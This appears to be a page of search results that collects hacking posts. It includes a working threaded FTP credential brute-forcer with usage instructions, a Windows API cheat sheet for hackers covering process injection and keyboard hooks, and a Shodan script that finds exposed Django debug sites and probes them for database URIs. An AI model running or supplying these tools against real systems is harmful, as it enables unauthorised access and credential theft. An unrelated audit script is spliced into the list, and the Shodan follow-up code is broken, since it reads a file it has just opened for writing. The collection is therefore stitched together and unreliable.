Found 8 results

  1.
         #!/usr/bin/python3
         """
         FTP-Bruteforcer 4 FXP-TERMiNAL.iNFO
         by SpliTerZ.tw!XX
         Faster than an ICE
         """
         import socket
         import sys
         import threading
         import time

         def CheckForLogin(target,username,password):
             sock = socket.socket()
             sock.settimeout(0.45)
             try:
                 server = (target,21)
                 user = "USER "+username+"\r\n"
                 pwd = "PASS "+password+"\r\n"
                 sock.connect(server)
                 sock.recv(4096)
                 sock.sendall(user.encode())
                 sock.recv(4096)
                 sock.sendall(pwd.encode())
                 answer = sock.recv(4096).decode('utf-8')
                 if "230" in answer:
                     open('bruted_ftp','a').write(target+":21 "+username+":"+password+"\n")
                     print("[x][x][x][x][x] Success on IP: "+target+"![x][x]\n")
                     sock.recvmsg(4096)
                 elif "530" in answer:
                     sock.close()
                 sock.close()
             except:
                 print("Login failed!\n")
                 pass

         if sys.argv[1]:
             hosts = open(sys.argv[1]).read().splitlines()
             usernames = sys.argv[2].split(",")
             passwords = open(sys.argv[3]).read().splitlines()
             for host in hosts:
                 for user in usernames:
                     for password in passwords:
                         T = threading.Thread(target=CheckForLogin,args=(host,user,password,))
                         if threading.active_count() <= int(sys.argv[4]):
                             T.start()
                         else:
                             time.sleep(0.3)
                             T.start()
             T.join()
             exit()

     Usage: python/python3 ftp-brute.py hostlist.txt user1,user2,user3,user4,... passwords.txt threadcount
  2. Hi guys. This is my first writeup in Shell Crew, so please ignore my grammatical and spelling mistakes 😝...

     So many newbies, when they come to the cybersec field and ask anyone how to start, are told by every experienced person: complete your basics. That's totally correct, because clearing the basics helps you understand and figure out cybersecurity stuff in the future...

     So the problem is that almost no one will come and personally teach you the basics, and a newcomer doesn't know which topics he/she should clear for the basics... Now many people will say that everything is already available on the internet, but there you will not get it in a properly categorized manner or as a step-by-step process.

     So, to help new people in cybersec, I made a GitHub repo where I put all the basics in a step-by-step manner with lessons. It's just a small contribution by me... I know people out there are doing better than me, but I believe that if even one person gets help from my repo, that's enough for me.

     My repo - https://github.com/rhonnysharma/Beginner

     OK, now let's assume you are that person who has cleared all your basics; then you can visit this repo - https://github.com/rhonnysharma/Web-Pentesting

     In my repo you will get all the latest: checklists, latest bypass payloads, roadmap etc., collected from Twitter, Instagram and various infosys writeups...

     Benefits ---> No need to figure out the latest tips, payload methods etc. from Twitter, Instagram and various infosys writeups. Get everything from one place.

     Thanks for reading 😛
  3. In the Windows environment, hackers must be able to program low-level APIs. These widely used APIs have been grouped into seven categories to help readers gain a better understanding of the Windows API commonly used by hackers and to promote potential queries using API methods. We hope this will be beneficial to everyone’s learning.

     One: Process

     Create a process:
         CreateProcess("C:\\windows\\notepad.exe",0,0,0,0,0,0,0,&si,&pi);
         WinExec("notepad",SW_SHOW);
         ShellExecute(0,"open","notepad","c:\\a.txt","",SW_SHOW);
         ShellExecuteEx(&sei);
     Traverse processes:
         CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
         Process32First(hsnap,&pe32);
         Process32Next(hsnap,&pe32);
     Terminate the process:
         ExitProcess(0);
         TerminateProcess(hProc,0);
     Open a process:
         OpenProcess(PROCESS_ALL_ACCESS,0,pid);
     Get the process ID:
         GetCurrentProcessId();
     Get the path of the process executable file:
         GetModuleFileName(NULL,buf,len);
         GetProcessImageFileName(hproc,buf,len);
     Traverse process module information:
         CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,pid);
         Module32First(hsnap,&mdl32);
         Module32Next(hsnap,&mdl32);
     Get the handle of the specified module:
         GetModuleHandle("kernel32.dll");
     Get the function address in the module:
         GetProcAddress(hmdl,"MessageBox");
     Load a DLL dynamically:
         LoadLibrary("user32.dll");
     Unload the DLL:
         FreeLibrary(hDll);
     Get process command line parameters:
         GetCommandLine();
         The 4-byte address one byte after the GetCommandLine function address of any process is the command line address.
     Read and write remote process data:
         ReadProcessMemory(hproc,baseAddr,buf,len,&size);
         WriteProcessMemory(hproc,baseAddr,buf,len,&size);
     Request memory:
         VirtualAlloc(0,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
         VirtualAllocEx(hproc,0,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
     Modify memory attributes:
         VirtualProtect(addr,size,PAGE_EXECUTE_READWRITE,&oldAddr);
         VirtualProtectEx(hproc,addr,size,PAGE_EXECUTE_READWRITE,&oldAddr);
     Free up memory:
         VirtualFree(addr,size,MEM_RELEASE);
         VirtualFreeEx(hproc,addr,size,MEM_RELEASE);
     Obtain the system version (Win NT/2K/XP<0x80000000):
         GetVersion();
     Read and write process priority:
         SetPriorityClass(hproc,Normal);
         GetPriorityClass(hproc);
         SetProcessPriorityBoost(hproc,true);
         GetProcessPriorityBoost(hproc,pBool);

     Two: Thread

     Create a thread (if the thread function of CreateThread calls strtok, rand, etc., you need to use _endthread() to release memory):
         CreateThread(0,0,startAddr,&para,0,&tid);
         _beginthread(startAddr,0,0);
         _beginthreadex(0,0,startAddr,0,0,&tid);
         CreateRemoteThread(hproc,0,0,func,&para,0,&tid);
     Get the thread ID:
         GetCurrentThreadId();
     Close the thread handle (reduces the usage count of the kernel object to prevent memory leaks):
         CloseHandle(hthread);
     Suspend and resume threads (a suspend count is maintained):
         SuspendThread(hthread);
         ResumeThread(hthread);
     Get the thread exit code:
         GetExitCodeThread(hthread,&code);
     Wait for the thread to exit (thread signaled state or timeout):
         WaitForSingleObject(hthread,1000);
         WaitForMultipleObjects(num,handles,true,INFINITE);
     Traverse threads:
         CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,0);
         Thread32First(hsnap,&mdl32);
         Thread32Next(hsnap,&mdl32);
     Get the thread function entry:
         ZwQueryInformationThread(hthread,ThreadQuerySetWin32StartAddress,&buf,4,NULL);
     Open a thread:
         OpenThread(THREAD_ALL_ACCESS,false,tid);
     Get the module to which the thread function address belongs:
         GetMappedFileName(hproc,addr,buf,256);
     Read and write thread priority:
         SetThreadPriority(hthread,Normal);
         GetThreadPriority(hthread);
         SetThreadPriorityBoost(hproc,true);
         GetThreadPriorityBoost(hproc,pBool);
     Terminate the thread:
         ExitThread(5);
         TerminateThread(hthread,5);
     Thread synchronization, critical section object:
         InitializeCriticalSection(&cs);
         EnterCriticalSection(&cs);
         LeaveCriticalSection(&cs);
         DeleteCriticalSection(&cs);
     Thread synchronization, event kernel object:
         OpenEvent(EVENT_ALL_ACCESS,false,name);
         CreateEvent(NULL,false,true,NULL);
         WaitForSingleObject(hevnt,INFINITE);
         SetEvent(hevnt);
         ResetEvent(hevnt);
     Thread synchronization, mutex kernel object:
         CreateMutex(NULL,false,NULL);
         WaitForSingleObject(hmutex,INFINITE);
         ReleaseMutex(hmutex);
         OpenMutex(MUTEX_ALL_ACCESS,false,name);

     Three: Registry

     Create a key:
         RegCreateKeyEx(HKEY_CURRENT_USER,"TestNewKey",0,0,REG_OPTION_VOLATILE,KEY_ALL_ACCESS,0,&subkey,&state);
     Open a key:
         RegOpenKeyEx(HKEY_CURRENT_USER,"Control Panel",0,KEY_ALL_ACCESS,&subkey);
     Close a key:
         RegCloseKey(hkey);
     Traverse keys:
         RegEnumKeyEx(hsubkey,index,keyname,&nameSize,0,0,0,&time);
         FileTimeToSystemTime(&time,&systime);
         RegQueryInfoKey(hsubkey,0,0,0,&count,0,0,0,0,0,0,0);
     Delete a key:
         RegDeleteKeyEx(hmainkey,subkeyName);
     Create a value:
         RegSetValueEx(hsubkey,"test",0,REG_DWORD,(BYTE*)&value,4);
     Traverse values:
         RegEnumValue(hsubkey,index,name,&nameSize,0,&type,valuebuf,valueLen);
         RegQueryValueEx(hsubkey,name,0,type,buf,&size);
     Delete a value:
         RegDeleteValue(hsubkey,valuename);

     Four: File

     Create / open a file:
         CreateFile("a.txt",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
     Set the file pointer:
         SetFilePointer(hFile,0,NULL,FILE_END);
     Read and write files:
         ReadFile(hFile,buf,len,&size,0);
         WriteFile(hFile,buf,len,&size,0);
     Force the file to be written to disk and clear the file cache:
         FlushFileBuffers(hFile);
     Lock a file area:
         LockFile(hFile,0,0,100,0);
         UnlockFile(hFile,0,0,100,0);
     Copy files:
         CopyFile(src,des,true);
         CopyFileEx(src,des,func,&para,false,COPY_FILE_FAIL_IF_EXISTS);
     Move files:
         MoveFile(src,des);
         MoveFileEx(src,des,false);
         MoveFileWithProgress(src,des,fun,&para,MOVEFILE_COPY_ALLOWED);
     Delete files:
         DeleteFile(filename);
     Get the file type (FILE_TYPE_PIPE):
         GetFileType(hFile);
     Get the file size:
         GetFileSize(hFile,&high);
     Get file attributes (for example, FILE_ATTRIBUTE_DIRECTORY for the & operation):
         GetFileAttributes(hFile);
     Traverse files:
         FindFirstFile(nameMode,&wfd);
         FindNextFile(hFile,&wfd);
     Create a pipe:
         CreatePipe(&hRead,&hWrite,&sa,0);
     Create a memory mapped file:
         CreateFile("d:\\a.txt",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,"myMap");
     Load the memory mapped file:
         MapViewOfFile(hmap,FILE_MAP_ALL_ACCESS,0,0,0);
     Open the memory mapped file:
         OpenFileMapping(FILE_MAP_ALL_ACCESS,false,"myMap");
     Unload the memory mapped file:
         UnmapViewOfFile(baseAddr);
     Force write of the memory mapped file to disk:
         FlushViewOfFile(baseAddr,len);
     Create a folder (only one level can be created):
         CreateDirectory("D:\\a",NULL);
         CreateDirectoryEx("C:\\a","D:\\b",NULL);
     Delete a folder (only an empty folder can be deleted):
         RemoveDirectory("C:\\a");
     Logical drive detection:
         GetLogicalDrives();
         GetLogicalDriveStrings(len,buf);
     Get the drive type (DRIVE_CDROM):
         GetDriveType("D:\\");

     Five: Network

     Open the network resource enumeration process (winnetwk.h, Mpr.lib):
         WNetOpenEnum(RESOURCE_GLOBAL,RESOURCETYPE_ANY,0,NULL,hnet);
     Enumerate network resources:
         WNetEnumResource(hnet,&count,pNetRsc,&size);
     Close the network resource enumeration process:
         WNetCloseEnum(hnet);
     Open and close the Winsock library:
         WSAStartup(version,&wsa);
         WSACleanup();
     Create a socket:
         socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
     Bind the socket IP and port:
         bind(sock,&addr,len);
     Listen for TCP connections:
         listen(sock,10);
     Receive a TCP connection request:
         accept(sock,&addr,&len);
     Client connection:
         connect(sock,&addr,len);
     Send TCP data:
         send(sock,buf,len,0);
     Receive TCP data:
         recv(sock,buf,len,0);
     Send UDP data:
         sendto(sock,buf,len,0,&addr,len);
     Receive UDP data:
         recvfrom(sock,buf,len,0,&addr,&len);

     Six: Service

     Open the SCM (Service Control Manager):
         OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
     Create a service:
         CreateService(mgr,"MyService","MyService",SERVICE_ALL_ACCESS,SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,path,NULL,NULL,NULL,NULL,NULL);
     Open the service object:
         OpenService(mgr,"MyService",SERVICE_START);
     Start the service:
         StartService(serv,0,NULL);
     Query service status:
         QueryServiceStatus(serv,&state);
     Close the service handle:
         CloseServiceHandle(hdl);
     Connect to the SCM:
         StartServiceCtrlDispatcher(DispatchTable);
     Register the service control function:
         RegisterServiceCtrlHandler("MyServicer",ServiceCtrl);
     Set service status:
         SetServiceStatus(hss,&ServiceStatus);
     Control the service:
         ControlService(serv,SERVICE_CONTROL_STOP,&state);
     Delete the service:
         DeleteService(serv);
     Traverse services:
         EnumServicesStatus(hscm,SERVICE_WIN32|SERVICE_DRIVER,SERVICE_STATE_ALL,&srvSts,len,&size,&count,NULL);
     Query service configuration:
         QueryServiceConfig(hserv,&srvcfg,size,&size);

     Seven: Messages

     Send a message:
         SendMessage(HWND_BROADCAST,WM_LBUTTONDOWN,0,0);
     Receive messages:
         GetMessage(&msg,NULL,0,0);
     Post a message:
         PostMessage(HWND_BROADCAST,WM_LBUTTONDOWN,0,0);
     Peek at a message:
         PeekMessage(&msg,NULL,0,0);
     Translate a message:
         TranslateMessage(&msg);
     Dispatch messages:
         DispatchMessage(&msg);
     Wait for a message:
         WaitMessage();
     Send an exit message:
         PostQuitMessage(0);
     Install the message hook:
         SetWindowsHookEx(WH_KEYBOARD,keyBoardProc,0,tid);
     Uninstall the message hook:
         UnhookWindowsHookEx(hhk);
  4. AWS PENETRATION TESTING PART 1. S3 BUCKETS

     Amazon Web Services (AWS) provides some of the most powerful and robust infrastructure for modern web applications. As with all new functionality on the web, new security considerations inevitably arise. For penetration testers, a number of AWS services can pose obscure challenges at times.

     In this series of blog posts, we will discuss AWS services in detail, common vulnerabilities and misconfigurations associated with them, and how to conduct sufficient security tests for each service with the aid of automated tools. This article is intended to be used by penetration testers with our AWS BurpSuite extension to easily assess the security of AWS S3 buckets.

     We’ve released our BurpSuite plugin AWS Extender which can identify and assess buckets discovered from proxy traffic. It also has been extended to identify identity pools, and Google Cloud and Microsoft Azure services as well.

     Download: The AWS Extender Burp Plugin
     Download: The AWS Extender CLI

     AMAZON SIMPLE STORAGE SERVICE (S3)

     Amazon S3 is an extremely popular object storage service that provides scalable storage infrastructure. And despite the possibility of hosting static websites, S3 by itself does not support code execution or any programmatic behavior. It only provides storage through the REST, SOAP, and BitTorrent web interfaces to read, upload, and delete static files.

     Amazon provides different mechanisms of access control for S3 buckets. That includes access control lists (ACLs), bucket policies, as well as IAM policies. By default, an S3 bucket is assigned a default ACL upon creation that grants the bucket owner full control over the bucket.

     S3 PENETRATION TESTING BASICS

     There are a few key concepts that any web application penetration tester should be aware of:

       • All S3 buckets share a global naming scheme. Bucket enumeration is not avoidable.
       • All S3 buckets have a DNS entry: [bucketname].s3.amazonaws.com
       • It’s generally easiest to access a bucket over its HTTP interface (https://[bucketname].s3.amazonaws.com) or to use the more powerful AWS CLI:

             apt-get install awscli
             aws s3 ls s3://mybucket

     S3 COMMON VULNERABILITIES

     If you’re new to AWS or S3, there are a few common vulnerabilities you should be aware of:

       • Unauthenticated Bucket Access – As the name implies, an S3 bucket can be configured to allow anonymous users to list, read, and or write to a bucket.
       • Semi-public Bucket Access – An S3 bucket is configured to allow access to “authenticated users”. This unfortunately means anyone authenticated to AWS. A valid AWS access key and secret is required to test for this condition.
       • Improper ACL Permissions – The ACL of the bucket has its own permissions which are often found to be world readable. This does not necessarily imply a misconfiguration of the bucket itself, however it may reveal which users have what type of access.

     ACCESS CONTROL LISTS (ACLS)

     S3 access control lists can be applied at the bucket level as well as at the object level. They generally support the following set of permissions:

       • READ
         At the bucket level, this allows the grantee to list the objects in a bucket. At the object level, this allows the grantee to read the contents as well as the metadata of an object.
       • WRITE
         At the bucket level, this allows the grantee to create, overwrite, and delete objects in a bucket.
       • READ_ACP
         At the bucket level, this allows the grantee to read the bucket’s access control list. At the object level, this allows the grantee to read the object’s access control list.
       • WRITE_ACP
         At the bucket level, this allows the grantee to set an ACL for a bucket. At the object level, this allows the grantee to set an ACL for an object.
       • FULL_CONTROL
         At the bucket level, this is equivalent to granting the “READ”, “WRITE”, “READ_ACP”, and “WRITE_ACP” permissions to a grantee. At the object level, this is equivalent to granting the “READ”, “READ_ACP”, and “WRITE_ACP” permissions to a grantee.

     A grantee can be an individual AWS user referenced by his canonical user ID or email address or one of the following predefined groups:

       • The Authenticated Users Group
         Represents all AWS users and is referenced by the URI “http://acs.amazonaws.com/groups/global/AuthenticatedUsers”.
       • The All Users Group
         Represents all users (including anonymous ones) and is referenced by the URI “http://acs.amazonaws.com/groups/global/AllUsers”.
       • The Log Delivery Group
         Relevant only for access logging and is referenced by the URI “http://acs.amazonaws.com/groups/s3/LogDelivery”.

     The following is a sample ACL:

         <?xml version="1.0" encoding="UTF-8"?>
         <AccessControlPolicy xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
           <Owner>
             <ID>*** Owner-Canonical-User-ID ***</ID>
             <DisplayName>owner-display-name</DisplayName>
           </Owner>
           <AccessControlList>
             <Grant>
               <Grantee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="CanonicalUser">
                 <ID>*** Owner-Canonical-User-ID ***</ID>
                 <DisplayName>display-name</DisplayName>
               </Grantee>
               <Permission>FULL_CONTROL</Permission>
             </Grant>
           </AccessControlList>
         </AccessControlPolicy>

     All of the aforementioned permissions are currently covered by the AWS Extender Burp extension. Namely, the following tests are performed once an S3 bucket is identified:

       • The extension attempts to list objects hosted in the bucket (READ).
       • The extension attempts to upload a “test.txt” file to the bucket (WRITE).
       • The extension attempts to retrieve the access control list of the bucket (READ_ACP).
       • The extension attempts to set the access control list of the bucket (WRITE_ACP) without actually changing it.

     Note: Similar tests are conducted for every identified S3 object.

     BUCKET POLICIES

     Using a bucket policy, a bucket owner can specify what a principal can perform on a specific resource. Where a principal can be any AWS user/group or all users including anonymous ones, an action can be any predefined permission supported by bucket policies, and a resource can be the entire bucket or a specific object. The following is a sample bucket policy expressed in the JSON format:

         {
           "Version":"2012-10-17",
           "Statement": [
             {
               "Effect":"Allow",
               "Principal": "*",
               "Action":["s3:GetObject"],
               "Resource":["arn:aws:s3:::examplebucket/*"]
             }
           ]
         }

     This policy allows the “s3:GetObject” action on the resource “arn:aws:s3:::examplebucket/*” for a wildcard principal “*”. This is effectively equivalent to granting the “READ” permission to the All Users group on the “examplebucket” S3 bucket using an access control list (ACL).

     The following permissions are currently covered by the AWS Extender Burp extension:

       • s3:ListBucket
       • s3:ListMultipartUploadParts
       • s3:GetBucketAcl
       • s3:PutBucketAcl
       • s3:PutObject
       • s3:GetBucketNotification
       • s3:PutBucketNotification
       • s3:GetBucketPolicy
       • s3:PutBucketPolicy
       • s3:GetBucketTagging
       • s3:PutBucketTagging
       • s3:GetBucketWebsite
       • s3:PutBucketWebsite
       • s3:GetBucketCORS
       • s3:PutBucketCORS
       • s3:GetLifecycleConfiguration
       • s3:PutLifecycleConfiguration
       • s3:PutBucketLogging

     Part 2 of the AWS series will cover more on S3 permissions including IAM and access tokens, as well as considerations for EC2, Cognito authentication and more.

     So, this is a little description of how to check for the S3 bucket misconfiguration vulnerability in a cloud-based application. And I know it's a bit tricky, but eventually you will start getting it as soon as you take an interest in reading. So, this is the end, and further on we will be looking at many such cloud pentesting techniques. Read, React, Comment & Share.
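A defender-side check for the ACL and bucket-policy rules described in the post above, as an added example that is not part of the original post or of AWS Extender: it reads an ACL document and a bucket policy offline and reports grants to the All Users / Authenticated Users groups and Allow statements with a wildcard principal. The function names and both sample documents are constructed for illustration.

```python
"""Offline audit of an S3 ACL (XML) and bucket policy (JSON) for public grants.

Added example: function names and the sample documents are constructed.
"""
import json
import xml.etree.ElementTree as ET

NS = {"s3": "http://s3.amazonaws.com/doc/2006-03-01/"}
XSI = "http://www.w3.org/2001/XMLSchema-instance"
XSI_TYPE = "{%s}type" % XSI
GROUPS = "http://acs.amazonaws.com/groups/global/"

# Predefined groups from the post that open a bucket beyond named users.
RISKY_GROUPS = {
    GROUPS + "AllUsers": "anyone, including anonymous users",
    GROUPS + "AuthenticatedUsers": "anyone authenticated to AWS",
}

# Constructed sample ACL: one owner grant plus two group grants.
SAMPLE_ACL = """
<AccessControlPolicy xmlns="http://s3.amazonaws.com/doc/2006-03-01/"
                     xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <Owner><ID>owner-id-placeholder</ID></Owner>
  <AccessControlList>
    <Grant>
      <Grantee xsi:type="CanonicalUser"><ID>owner-id-placeholder</ID></Grantee>
      <Permission>FULL_CONTROL</Permission>
    </Grant>
    <Grant>
      <Grantee xsi:type="Group">
        <URI>http://acs.amazonaws.com/groups/global/AllUsers</URI>
      </Grantee>
      <Permission>READ</Permission>
    </Grant>
    <Grant>
      <Grantee xsi:type="Group">
        <URI>http://acs.amazonaws.com/groups/global/AuthenticatedUsers</URI>
      </Grantee>
      <Permission>WRITE_ACP</Permission>
    </Grant>
  </AccessControlList>
</AccessControlPolicy>
""".strip()

# Constructed sample policy: the post's statement, a conditional wildcard, a named user.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Principal": "*",
         "Action": ["s3:GetObject"], "Resource": ["arn:aws:s3:::examplebucket/*"]},
        {"Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": "s3:ListBucket", "Resource": "arn:aws:s3:::examplebucket",
         "Condition": {"IpAddress": {"aws:SourceIp": "203.0.113.0/24"}}},
        {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::111122223333:user/example"},
         "Action": "s3:PutObject", "Resource": "arn:aws:s3:::examplebucket/*"},
    ],
})


def audit_acl(acl_xml):
    """Return (group_uri, permission) for every grant made to a risky predefined group."""
    findings = []
    root = ET.fromstring(acl_xml)
    for grant in root.findall("s3:AccessControlList/s3:Grant", NS):
        grantee = grant.find("s3:Grantee", NS)
        if grantee is None or grantee.get(XSI_TYPE) != "Group":
            continue  # canonical users and e-mail grantees are named principals
        uri = grantee.findtext("s3:URI", default="", namespaces=NS).strip()
        permission = grant.findtext("s3:Permission", default="", namespaces=NS).strip()
        if uri in RISKY_GROUPS:
            findings.append((uri, permission))
    return findings


def as_list(value):
    """Policy fields may hold a single value or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def is_wildcard_principal(principal):
    """True for "Principal": "*" and for forms such as {"AWS": "*"}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any("*" in as_list(v) for v in principal.values())
    return False


def audit_policy(policy_json):
    """Return (action, resource, has_condition) for Allow statements open to everyone."""
    findings = []
    policy = json.loads(policy_json)
    for stmt in as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not is_wildcard_principal(stmt.get("Principal")):
            continue
        conditional = "Condition" in stmt  # a Condition may narrow the wildcard; review it
        for action in as_list(stmt.get("Action", [])):
            for resource in as_list(stmt.get("Resource", [])):
                findings.append((action, resource, conditional))
    return findings


def report(acl_xml, policy_json):
    """Build human-readable finding lines for one bucket's ACL and policy."""
    lines = ["ACL grants %s to %s" % (perm, RISKY_GROUPS[uri])
             for uri, perm in audit_acl(acl_xml)]
    for action, resource, conditional in audit_policy(policy_json):
        note = " (has Condition, review it)" if conditional else ""
        lines.append("Policy allows %s on %s for any principal%s" % (action, resource, note))
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_ACL, SAMPLE_POLICY)))
```
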
  5. Hey Guys! I am Venom! I hope you all are fine! Today I am sharing the web crawler script written in python! So let's begin!

         import requests  # using requests library for getting the source code from site.
         import re  # using re module for getting a tags
         from urllib.parse import urljoin  # urljoin to complete relative urls
         from bs4 import BeautifulSoup  # using bs4 to parse code using html parser

         urls = []  # to store the urls used
         target_links = []
         url = []
         target = input("[+] Enter the url: ")  # taking target url as user input


         def extract(tar):  # making a function extract with a value tar
             try:  # try and except in case we got some status or http error
                 response = requests.get(tar)  # getting the content of the url passed in
                 soup = BeautifulSoup(response.content, 'html.parser')  # parsing the content
                 return re.findall('(?:href=")(.*?)"', str(soup))  # find urls using the regex pattern
             except Exception:
                 return []  # if any error occurs, return no links so crawl() can carry on


         def crawl(path):  # making another function crawl which takes an argument
             links = extract(path)  # extract gets all the links from the page given as argument
             for link in links:  # using for loop to format the urls and crawl them again one by one
                 url = urljoin(path, link)  # if url is not complete then joining the url with the page url
                 if "#" in url:
                     url = url.split("#")[0]  # if there is a # in url then keep only the part before it
                 if target in url and url not in target_links:  # stay on the target site and skip urls already seen
                     target_links.append(url)  # append the url to target link
                     urls.append(target_links)
                     print("[+] " + url)  # printing the url which we have found!
                     crawl(url)  # now again running the crawl loop on the url!


         crawl(target)  # running the crawl function with target url as argument!
  6. CTF (Capture The Flag) - Hack the Box 👩‍💻♥️💫✨

     If you are looking for opportunities to expand your horizons and learn more about digital security, then CTF is probably the stuff you should give a try, and HTB (Hack the Box) is one such example. Here I'm going to share the top pentesting labs you should venture into and aim for if you have a higher level of appetite.

     ~ With Best Regards MR.MIME ✌️💫 Happy Learning
  7. Let’s install the shodan module by executing the following command.

         pip install shodan

         import shodan

         SHODAN_API_KEY = "YOUR_SHODAN_API"
         api = shodan.Shodan(SHODAN_API_KEY)
         words = open("bug-bounty-wordlist.txt","r")
         django_debug_list = open("django-debug-list.txt","w")
         for word in words.readlines():
             query = "html:'URLconf defined' ssl:"+word.strip('\n')
             try:
                 results = api.search(query)
                 print('Results found: {}'.format(results['total']))
                 for result in results['matches']:
                     print(word)
                     print('IP: {}'.format(result['ip_str']))
                     port = result['port']
                     if port in [80,443]:
                         if port==443:
                             ip = "https://"+result['ip_str']
                         else:
                             ip = "http://"+result['ip_str']
                     else:
                         ip = "http://"+result['ip_str']+":"+str(port)
                     django_debug_list.write(ip+'\n')
                     print('')
             except Exception as e:
                 print(e)

     This shodan python module is an official wrapper around the shodan API. We can use all the filters specified in the shodan docs via this module. You need to get an API key at shodan.io by creating an account. Every year in November, as a Black Friday offer, shodan provides a member account for $5. You can afford it.

     In the above program, we have opened a domain wordlist file and iterate over it in a loop, then construct the shodan query, which can be passed to the shodan search API function, which returns a list of dictionaries. You can check the IP address manually or you can automate that process also.

     Okay, let’s automate:

         import requests,re

         django_debug_list = open("django-debug-list.txt","w")
         regex = r"(?:mongodb|redis):\/\/"
         for ip in django_debug_list.readlines():
             try:
                 response = requests.post(url=ip.rstrip("\n")+"/admin",data= {},verify=False)
                 if re.search(regex,response.content):
                     print("Mongodb/Redis URI Found")
             except Exception as e:
                 print(e)

     Here you can see a regex to match mongodb:// or redis:// or both. You can see a function rstrip that is used to remove something from the right of a string; here I removed the new line (\n) character. I passed a parameter verify=False, which means I tell the program not to verify the SSL certificate of the server. You can use your own regex to match something else other than a mongodb/redis URI.
  8. Mobile applications often process sensitive data, which is the key target of many cybercriminals. When working with such data, developers must do their best to ensure its protection. One way to improve the security of a mobile app is to perform mobile application penetration testing. To find flaws in their application code, developers need at least basic skills in reverse engineering and pentesting Android applications. In this article, we discuss different methods an attacker might use to hack your apps. We also explain how challenges from the Open Web Application Security Project (OWASP) Mobile Security Testing Guide (MSTG) can help you in Android application security testing and what tools you can use to solve them. Strengthen your app’s security with reverse engineering Android is quite a developer-friendly operating system (OS). Unlike other mobile OSs, Android is an open-source platform on which you can activate Developer Options and sideload applications without jumping through too many hoops. Furthermore, Android allows developers to explore its source code at the Android Open Source Project and to modify operating system functionality however they like. However, working with Android applications also means you’ll need to deal with Java bytecode and Java native code. Some developers may see this as a disadvantage. Android developers use the Java Native Interface to improve application performance, support legacy code, and, of course, confuse those who try to look inside their apps. When building mobile applications, one of the top priorities for a development team is to ensure a high level of data security. Developers should do their best to prevent cybercriminals from getting access to a user’s sensitive information. Some try improving the security of their mobile apps with the help of third-party solutions. However, when working with third-party products, it’s critical to configure them properly. 
A misconfigured or improperly used solution will be of no help, no matter how expensive it is. Others try to hide the application’s functionality and data in the native layer. In some cases, they build Android applications in such a way that execution jumps between the native layer and the runtime layer. There are also developers who use more sophisticated methods, such as reverse engineering. This technique is quite helpful when it comes to ensuring proper protection of an application’s sensitive data. That’s why it’s best for a developer to have at least some basic skills in reverse engineering: Unpacking APK files Patching .smali files Patching .so libraries Using debugging tools Working with frameworks for dynamic code analysis With these skills and expertise, mobile app developers will have a better chance of detecting code flaws that might be used by attackers. For instance, in order to break into your application, hackers may use the same techniques that quality assurance (QA) specialists use when they test an application’s security and performance: Dynamic analysis is used to find possible ways to manipulate application data when the application is running. For example, hackers may try to crack your app by skipping the multi-factor code check during login. Static analysis is used for studying an already packaged application and detecting code weaknesses without having direct access to the source code. With static analysis, we don’t look at the application’s behavior at runtime, as we do during dynamic analysis. Hackers may use static analysis to detect the use of a weak encryption algorithm, for instance. A basic toolset for Android reverse engineering Before you start solving the OWASP CrackMe challenges for Android developers, you need to make sure you have two things: Knowledge of Android environments. You need to have some experience working with Java and Linux environments as well as with Android kernels. The right set of tools. 
Working with bytecode and native code running on a Java virtual machine (JVM) requires specific tools. In this section, we list and briefly describe tools that you can use to solve the OWASP CrackMe challenges and upgrade your reverse engineering skills. Note: For the purposes of this article, we’ve chosen only tools and frameworks that are either free or have free trial versions. Android Studio — The official integrated development environment (IDE) for Android. This is the primary IDE for building native Android apps; it includes an APK analyzer, code editor, visual layout editor, and more. In particular, we’ll use the command-line Android Debug Bridge (adb) tool. Apktool — This is a popular free tool for reverse engineering closed, third-party, and binary Android applications. It can disassemble Java bytecode to the .smali format as well as extract and disassemble resources from APK archives. Also, you can use Apktool for patching and changing the manifest file. Note: Application code is stored in the APK file, which contains the .dex file with Dalvik binary bytecode. Dalvik is a data format understandable by the Android platform but completely unreadable for humans. So for a developer to be able to work with .dex files, they need to be converted to (and from) a readable format, such as .smali. Cutter — An open-source cross-platform framework that provides a customizable, easy-to-use reverse engineering platform. This framework is powered by radare2 and is supported by a large community of professional reverse engineers. Hex Workshop Editor — A popular set of Windows hexadecimal development tools. This toolset makes editing binary data nearly as simple as working with regular text documents. Hex Workshop Editor is commercial but has a free trial version. Note: Hex Workshop Editor can only be used on Windows. If you’re working with a Linux-based virtual machine, you can choose any Linux hex editor. 
